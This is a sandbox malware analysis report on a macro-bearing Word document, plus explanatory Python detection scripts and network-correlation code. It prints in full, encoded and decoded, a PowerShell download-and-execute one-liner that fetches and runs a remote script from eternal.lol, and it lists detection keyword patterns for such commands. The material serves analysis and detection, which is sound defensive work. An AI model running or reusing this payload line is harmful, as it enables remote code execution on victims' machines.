
Windows Analysis Report
DUD6CqQ1Uj.doc

Overview

General Information

Sample name: DUD6CqQ1Uj.doc (renamed because the original name is a hash value)
Original sample name: 9ebf60ad31f0eb1fa303e0b00f9cc605c5013ea30771e6b14409cb70af7416cb.doc (the file's own SHA256)
Analysis ID: 1584650
MD5: 4fd8d5da5cd2109c730052735c9ccbb6
SHA1: 2d175610936cdfc27380c13d89f5883db532d2b2
SHA256: 9ebf60ad31f0eb1fa303e0b00f9cc605c5013ea30771e6b14409cb70af7416cb
Tags: docuser-zhuzhu0009 (as extracted; probably the two tags "doc" and "user-zhuzhu0009" run together)

Detection

Score: 96 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Document exploit detected (process start blacklist hit)
Encrypted powershell cmdline option found
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Office process queries suspicious COM object (likely to drop second stage)
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Contains long sleeps (>= 3 min)
Detected non-DNS traffic on DNS port
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Execution of Powershell with Base64
Uses code obfuscation techniques (call, push, ret)

Process Tree

  • System is w11x64_office
  • WINWORD.EXE (PID: 7328, cmdline: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, MD5: A9F0EC89897AC6C878D217DFB64CA752)
    • powershell.exe (PID: 7996, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHQAZQByAG4AYQBsAC4AbABvAGwALwBmAGkAbABlAC8AOABlADUAMwBhADMAZQAwADIAMwAyADEAOABhADkAYgAxAGUAZgA5AGIAYQAxAGUAZgAzAGIANQBhAGYAZAAxADkAMQBhADkAOQAxADUANgBiADcANwA4ADYANAA1ADUAOABkAC8AOABlAGUAZgA0AGQAZgAzADgAOABmADIAMgAxADcAYwBhAGUAYwAzAGQAYwAyADYALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", MD5: 9D8E30DAF21108092D5980C931876B7E)
      • conhost.exe (PID: 7976, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 9698384842DA735D80D278A427A229AB)
  • cleanup

Malware Configuration

No configs have been found
Yara Matches

  Source: Process Memory Space: powershell.exe PID: 7996
  Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security

  Source: amsi64_7996.amsi.csv (AMSI scan buffer captured from PID 7996)
  Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security

      System Summary

      Sigma matches. All six fire on the same process-creation event, powershell.exe (PID 7996) started by WINWORD.EXE (PID 7328):

        Image / NewProcessName / OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHQAZQByAG4AYQBsAC4AbABvAGwALwBmAGkAbABlAC8AOABlADUAMwBhADMAZQAwADIAMwAyADEAOABhADkAYgAxAGUAZgA5AGIAYQAxAGUAZgAzAGIANQBhAGYAZAAxADkAMQBhADkAOQAxADUANgBiADcANwA4ADYANAA1ADUAOABkAC8AOABlAGUAZgA0AGQAZgAzADgAOABmADIAMgAxADcAYwBhAGUAYwAzAGQAYwAyADYALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA""
        ParentImage: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
        ParentCommandLine: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
        ParentProcessId: 7328, ProcessId: 7996
        Matched field: CommandLine|base64offset|contains

      The -e argument is base64 of a UTF-16LE string. Decoded, it reads:

        IEX (New-Object Net.WebClient).DownloadString('https://eternal.lol/file/8e53a3e023218a9b1ef9ba1ef3b5afd191a99156b77864558d/8eef4df388f2217caec3dc26.jpg');oawnduawdnnhn9283h1921nawodanfiawbdniufbnaidwuaifuabiufbaiudbhjawdbafhj

      That is a stock download-and-execute one-liner: fetch a script served under a .jpg name from eternal.lol and run it in memory with Invoke-Expression. The bareword after the ";" is not a command; PowerShell raises CommandNotFoundException for it only after the IEX statement has already run, so it alters the encoded blob (and defeats any hash or exact-string signature on it) without changing behaviour.

      Rule authors for the six matches (the rule names correspond to the "Sigma detected: ..." entries in the Signatures list above):
        - Florian Roth (Nextron Systems)
        - Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community
        - Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io
        - Florian Roth (Nextron Systems)
        - frack113
        - Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)

      "CommandLine|base64offset|contains" is the Sigma field modifier the encoded-PowerShell rules rely on: instead of decoding, it searches for the three base64 spellings a keyword such as IEX or DownloadString can take depending on its byte offset modulo 3, so the match works directly on the command line as logged.
      No Suricata rule has matched
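The Sigma matches above all rest on one fact: the -e argument is base64 of a UTF-16LE string, so a rule can either decode it or match keyword fragments against the still-encoded text. The script below is an added example written for this page, not Joe Sandbox's or the Sigma project's code. It takes the process-creation event as the report records it (command line, image paths and PIDs are copied from the Sigma data; the explorer.exe event is a constructed benign contrast), reproduces Sigma's base64offset modifier to match IEX, DownloadString and Net.WebClient inside the encoded blob at any of the three alignments, flags the Office-parent-to-script-host relationship the "Suspicious Microsoft Office Child Process" rule looks for, decodes the -EncodedCommand payload and extracts the download URL. Function and field names are the example's own.

```python
import base64
import binascii
import ntpath
import re
from typing import Dict, List, Optional

# The process-creation event for PID 7996, copied from the Sigma matches in this
# report. The trailing "" is part of the recorded command line.
ENCODED_BLOB = (
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"
    "LgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHQAZQByAG4AYQBsAC4AbABvAGwA"
    "LwBmAGkAbABlAC8AOABlADUAMwBhADMAZQAwADIAMwAyADEAOABhADkAYgAxAGUAZgA5AGIAYQAxAGUAZgAzAGIANQBhAGYAZAAxADkAMQBhADkAOQAxADUANgBiADcANwA4ADYANAA1ADUAOABkAC8A"
    "OABlAGUAZgA0AGQAZgAzADgAOABmADIAMgAxADcAYwBhAGUAYwAzAGQAYwAyADYALgBqAHAAZwAnACkAOwBv"
    "AGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"
)
SANDBOX_EVENT = {
    "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    "ParentCommandLine": r'"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding',
    "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e ' + ENCODED_BLOB + '""',
    "ProcessId": 7996,
    "ParentProcessId": 7328,
}
# Constructed benign event for contrast (not from the report): an interactive shell.
BENIGN_EVENT = {
    "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "ParentImage": r"C:\Windows\explorer.exe",
    "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command Get-Service',
}

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
               "msaccess.exe", "mspub.exe", "onenote.exe", "visio.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "msiexec.exe"}
DOWNLOAD_EXEC_TOKENS = ("IEX", "Invoke-Expression", "DownloadString", "DownloadFile",
                        "Net.WebClient", "Invoke-WebRequest", "FromBase64String")
# powershell.exe accepts any prefix of -EncodedCommand plus the -ec alias, with - or /.
_ENC_ALIASES = ["encodedcommand"[:n] for n in range(14, 0, -1)] + ["ec"]
ENCODED_FLAG = re.compile(
    r"(?:^|\s)[-/](?:" + "|".join(_ENC_ALIASES) + r")\s+[\"']?([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)


def base64offset_variants(needle: str, encoding: str = "utf-16-le") -> List[str]:
    """Sigma's base64offset modifier: the three strings base64(needle) can appear
    as inside a longer base64 stream, one per byte offset modulo 3. Pad with
    0-2 bytes, encode, then trim the characters that depend on the neighbours."""
    raw = needle.encode(encoding)
    starts, ends = (0, 2, 3), (None, -3, -2)
    return [
        base64.b64encode(b" " * i + raw).decode("ascii")[starts[i]:ends[(len(raw) + i) % 3]]
        for i in range(3)
    ]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script passed via -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)  # re-add padding a logging pipeline may have dropped
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-16-le", errors="replace")


def analyse_process_event(event: Dict[str, object]) -> Dict[str, object]:
    """Apply the report's three detection angles to one process-creation event."""
    cmdline = str(event.get("CommandLine", ""))
    image = ntpath.basename(str(event.get("Image", ""))).lower()
    parent = ntpath.basename(str(event.get("ParentImage", ""))).lower()
    findings: List[str] = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        findings.append(f"office_child_process:{parent}->{image}")
    # Keyword matching on the still-encoded command line, as a compiled Sigma rule does.
    for needle in ("IEX (", "Invoke-Expression", "DownloadString", "DownloadFile", "Net.WebClient"):
        if any(v in cmdline for v in base64offset_variants(needle)):
            findings.append(f"base64offset:{needle}")
    decoded = decode_encoded_command(cmdline)
    urls: List[str] = []
    if decoded is not None:
        urls = re.findall(r"https?://[^\s'\"()]+", decoded)
        hits = [t for t in DOWNLOAD_EXEC_TOKENS if t.lower() in decoded.lower()]
        if hits:
            findings.append("decoded:" + ",".join(hits))
    return {"findings": findings, "decoded": decoded, "urls": urls}


if __name__ == "__main__":
    for ev in (SANDBOX_EVENT, BENIGN_EVENT):
        print(analyse_process_event(ev))
```

base64offset matters because the same keyword encodes to three different strings depending on its byte offset modulo 3; a single literal catches one alignment in three, which is why rules that hard-code patterns list three per keyword. Decoding first is more robust and yields the URL for blocking, but it needs a valid blob and a decode step per event, so detection content usually does both. The decoder re-adds "=" padding so that a blob whose trailing padding was trimmed by a logging pipeline still decodes.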


      AV Detection

      Source: DUD6CqQ1Uj.doc | Virustotal: Detection: 62%
      Source: DUD6CqQ1Uj.doc | ReversingLabs: Detection: 60%
      Source: C:\Users\user\Desktop\~WRD0000.tmp | Joe Sandbox ML: detected
      Source: DUD6CqQ1Uj.doc | Joe Sandbox ML: detected

      File and string indicators (listed without a category heading in the original):

      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | File opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dll
      Source: powershell.exe, 00000004.00000002.12721503524.000002ADE088E000.00000004.00000020.00020000.00000000.sdmp | Binary string: em.pdb (PDB path fragment, truncated as extracted)
      Source: powershell.exe, 00000004.00000002.12719937739.000002ADE06B7000.00000004.00000020.00020000.00000000.sdmp | Binary string: m.pdb (PDB path fragment, truncated as extracted)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened, in order: C:\Users\user\AppData\Roaming\Microsoft\Windows; C:\Users\user; C:\Users\user\AppData\Roaming\Microsoft; C:\Users\user\AppData; C:\Users\user\AppData\Roaming; C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

      Software Vulnerabilities

      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

      Networking

      Source: global traffic | DNS query: eternal.lol (also reported as "DNS traffic detected: DNS query: eternal.lol")
      Source: global traffic | TCP flows, collapsed from the per-packet rows of the original report:
        192.168.2.24:52776 <-> 1.1.1.1:53          6 outbound and 4 inbound entries
        192.168.2.24:52782 <-> 192.64.119.42:443   10 outbound and 4 inbound entries
        192.168.2.24:52794 <-> 192.64.119.42:443   10 outbound and 4 inbound entries
      Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1 (5 entries)
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (1 entry)
      Source: unknown | Network traffic detected: HTTP traffic on port 52782 -> 443, 443 -> 52794, 443 -> 52782, 52794 -> 443

      Reading the flows: 192.64.119.42:443 is the only endpoint other than the resolver and carries two connections, consistent with the https://eternal.lol/... URL found in powershell.exe memory (below) being fetched by the WebClient call. 1.1.1.1 is a public resolver; the "without corresponding DNS query" hits on it are expected, since a resolver's own address is never the answer to a lookup, and the TCP/53 flow to it (the "non-DNS traffic on DNS port" signature) is most likely the Windows resolver's TCP retry after a truncated UDP answer, not an indicator on its own. Joe labels the port 443 flows "HTTP traffic"; the URL is https, so the payload was fetched over TLS and no request path is visible in the capture.

      Source: powershell.exe process memory, PID 7996 (dumps 00000004.00000002.*; region addresses given per string) | Strings found in binary or memory:

        Payload URL (the DownloadString target):
          https://eternal.lol  [000002ADC8756000]
          https://eternal.lol/file/8e53a3e023218a9b1ef9ba1ef3b5afd191a99156b77864558d/8eef4df388f2217caec3dc26  [000002ADC8531000, 000002ADC8756000] (truncated as extracted from the dump)

        Certificate chain:
          http://crl.comodoca.com/AAACertificateServices.crl06  [000002ADE0668000] (CRL URL from a Comodo/Sectigo chain; trailing "06" is ASN.1 residue)

        Standard PowerShell and .NET strings (help links, Pester and NuGet manifest templates, schema and licence URLs; not specific to this sample):
          http://nuget.org/NuGet.exe, https://nuget.org/nuget.exe  [000002ADD85C2000]
          https://contoso.com/, https://contoso.com/Icon, https://contoso.com/License  [000002ADD85C2000]
          http://pesterbdd.com/images/Pester.png, https://github.com/Pester/Pester, http://www.apache.org/licenses/LICENSE-2.0.html  [000002ADC8756000] (each also present once with a trailing "xBX%" garbage suffix)
          http://schemas.xmlsoap.org/soap/encoding/, http://schemas.xmlsoap.org/wsdl/  [000002ADC88EC000]
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name  [000002ADC8531000]
          https://aka.ms/PSWindows3  [000002ADC8531000]
          https://aka.ms/powershell51-help  [000002ADC8756000, 000002ADC88EC000, 000002ADCA5FC000] (also with trailing "(WZ%" and "xBX%" garbage)
          https://aka.ms/w  [000002ADC99B2000, 000002ADCA0DE000, 000002ADC88EC000, 000002ADCA5FC000] (truncated as extracted)
          https://aka.ms/winsvr-2022-ps, https://aka.ms/winsvr-2022-pss  [000002ADC88EC000]
          https://aka.ms/winsvr-2022-pshelp  [000002ADCA5FC000, 000002ADE0918000] (also with trailing "(WZ%" in 000002ADCA330000, 000002ADC99B2000, 000002ADCA30A000, 000002ADC9B52000 and "xBX%" in 000002ADC88EC000)
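The "without corresponding DNS query" and "non-DNS traffic on DNS port" findings above come from one correlation: which remote addresses the sample contacted, and whether a DNS answer preceded each. The script below is an added example written for this page, not Joe Sandbox's code. It runs that correlation over a log constructed in the report's own line style: the flows and the eternal.lol query are the report's; the A record tying eternal.lol to 192.64.119.42 and the flow to 198.51.100.7 (an RFC 5737 test address) are assumptions added so that both the resolved and the direct-to-IP paths are exercised. It also shows why 1.1.1.1 trips the sandbox heuristic and how to exempt it without losing real hard-coded IPs.

```python
import ipaddress
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# Constructed log in the report's own line style. The flows and the eternal.lol
# query come from the report; the A record and the 198.51.100.7 flow are
# assumptions added for the example.
NETWORK_LOG = """
DNS query: name: eternal.lol
DNS answer: eternal.lol A 192.64.119.42
UDP traffic: 192.168.2.24:52776 -> 1.1.1.1:53
TCP traffic: 192.168.2.24:52776 -> 1.1.1.1:53
TCP traffic: 1.1.1.1:53 -> 192.168.2.24:52776
TCP traffic: 192.168.2.24:52782 -> 192.64.119.42:443
TCP traffic: 192.64.119.42:443 -> 192.168.2.24:52782
TCP traffic: 192.168.2.24:52794 -> 192.64.119.42:443
TCP traffic: 192.168.2.24:52801 -> 198.51.100.7:8080
"""

FLOW_RE = re.compile(r"^(TCP|UDP) traffic: (\S+):(\d+) -> (\S+):(\d+)$")
ANSWER_RE = re.compile(r"^DNS answer: (\S+) A (\S+)$")


def correlate(log: str, local_net: str, resolvers: Tuple[str, ...]) -> Dict[str, object]:
    """Group flows by remote endpoint and split them into DNS-resolved and direct-to-IP."""
    local = ipaddress.ip_network(local_net)
    resolved: Dict[str, Set[str]] = defaultdict(set)      # ip -> names it was the answer for
    endpoints: Dict[Tuple[str, int, str], int] = defaultdict(int)
    tcp_on_dns_port: List[str] = []
    for line in log.strip().splitlines():
        line = line.strip()
        m = ANSWER_RE.match(line)
        if m:
            resolved[m.group(2)].add(m.group(1))
            continue
        m = FLOW_RE.match(line)
        if not m:
            continue  # query lines and anything else carry no endpoint
        proto, src, sport, dst, dport = m.group(1), m.group(2), int(m.group(3)), m.group(4), int(m.group(5))
        # Normalise direction so a reply (remote:443 -> host:52782) counts for the
        # same remote endpoint as the request that opened the connection.
        if ipaddress.ip_address(src) in local:
            remote, rport = dst, dport
        else:
            remote, rport = src, sport
        endpoints[(remote, rport, proto)] += 1
        if proto == "TCP" and rport == 53:
            tcp_on_dns_port.append(line)
    # A resolver's own address is never the answer to a query, so it is exempted;
    # every other address contacted without a preceding answer is a hard-coded IP.
    unresolved = sorted({ip for (ip, _port, _proto) in endpoints
                         if ip not in resolved and ip not in resolvers})
    return {
        "endpoints": dict(endpoints),
        "resolved": {ip: sorted(names) for ip, names in resolved.items()},
        "unresolved": unresolved,
        "tcp_on_dns_port": tcp_on_dns_port,
    }


if __name__ == "__main__":
    print(correlate(NETWORK_LOG, "192.168.2.0/24", ("1.1.1.1",)))
```

Run with an empty resolver tuple and 1.1.1.1 reappears in the unresolved set, which is exactly the report's finding. TCP to port 53 is reported separately rather than treated as hostile: the Windows resolver retries over TCP when a UDP answer is truncated, so TCP/53 to the same resolver that received the UDP query is usually legitimate, while TCP/53 to an address that never saw a UDP query deserves a closer look.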

      System Summary

      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | COM object queried: Windows Script Host Shell Object, HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} (WScript.Shell, the object a VBA macro typically uses to start a child process)
      Source: DUD6CqQ1Uj.doc | OLE, VBA macro line: Private Sub Document_Open()
      Source: ~WRD0000.tmp.0.dr | OLE, VBA macro line: Private Sub Document_Open()
      Source: DUD6CqQ1Uj.doc | OLE indicator, VBA macros: true
      Source: ~WRD0000.tmp.0.dr | OLE indicator, VBA macros: true
      Source: classification engine | Classification label: mal96.expl.evad.winDOC@5/16@1/1
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | File created: C:\Users\user\Desktop\~$D6CqQ1Uj.doc
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\{BFB6DE8C-27AF-4068-A53F-CE81F8F2E39D} - OProcSessId.dat
      Source: DUD6CqQ1Uj.doc | OLE indicator, Word Document stream: true
      Source: ~WRD0000.tmp.0.dr | OLE indicator, Word Document stream: true
      Source: DUD6CqQ1Uj.doc | OLE document summary: title field not present or empty; edited time not present or 0
      Source: ~WRD0000.tmp.0.dr | OLE document summary: title field not present or empty; edited time not present or 0
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | File read: C:\Users\desktop.ini
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: DUD6CqQ1Uj.doc | Virustotal: Detection: 62%
      Source: DUD6CqQ1Uj.doc | ReversingLabs: Detection: 60%
      Source: unknown | Process created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e <UTF-16LE base64 blob, given in full in the process tree>""
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | Process created: unknown unknown
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (same command line as above; the behaviour log lists the event a second time)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded, in order: atl.dll, mscoree.dll, kernel.appcore.dll, uxtheme.dll, windows.storage.dll, wintypes.dll, appresolver.dll, userenv.dll, propsys.dll, bcp47langs.dll, cfgmgr32.dll, profapi.dll, linkinfo.dll, ntshrui.dll, sspicli.dll, srvcli.dll, cscapi.dll, taskflowdataengine.dll, onecorecommonproxystub.dll, version.dll, vcruntime140_1_clr0400.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, msasn1.dll, gpapi.dll, wldp.dll, appidapi.dll, srpapi.dll, secur32.dll, rasapi32.dll, rtutils.dll, rasman.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, urlmon.dll, iertutil.dll, netutils.dll, netutils.dll, virtdisk.dll, wininet.dll, kdscli.dll, ntasn1.dll, ncrypt.dll
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32 (resolving the in-process server DLL for WScript.Shell before instantiating it)
      Source: Window Recorder | Window detected: More than 3 window changes detected

      Reading the chain: the Document_Open macro (present in both the sample and the ~WRD0000.tmp copy dropped by Word) runs as soon as the document is opened with macros enabled, and the WScript.Shell lookups by WINWORD.EXE immediately before the powershell.exe child most likely mean it is that object's Run method that launches the encoded command. powershell.exe then loads amsi.dll, so the script content reached AMSI (presumably the source of the amsi64_7996.amsi.csv Yara hit), followed by the winhttp, dnsapi, schannel and wininet chain that a .NET WebClient needs for an HTTPS download. The ~$D6CqQ1Uj.doc owner file and the OProcSessId.dat temp file are ordinary Word side effects, not indicators.
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
      Source: DUD6CqQ1Uj.docInitial sample: OLE summary codepage = 1200
      Source: DUD6CqQ1Uj.docInitial sample: OLE document summary codepagedoc = 1200
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
      Source: Binary string: em.pdb source: powershell.exe, 00000004.00000002.12721503524.000002ADE088E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: m.pdb source: powershell.exe, 00000004.00000002.12719937739.000002ADE06B7000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFCC9441354 push ebx; iretd 4_2_00007FFCC944135A
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFCC9441748 push ebx; retf 4_2_00007FFCC944175A
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFCC95141A7 pushad ; iretd 4_2_00007FFCC9514311
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFCC9515186 push ss; retf 4_2_00007FFCC9515187

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
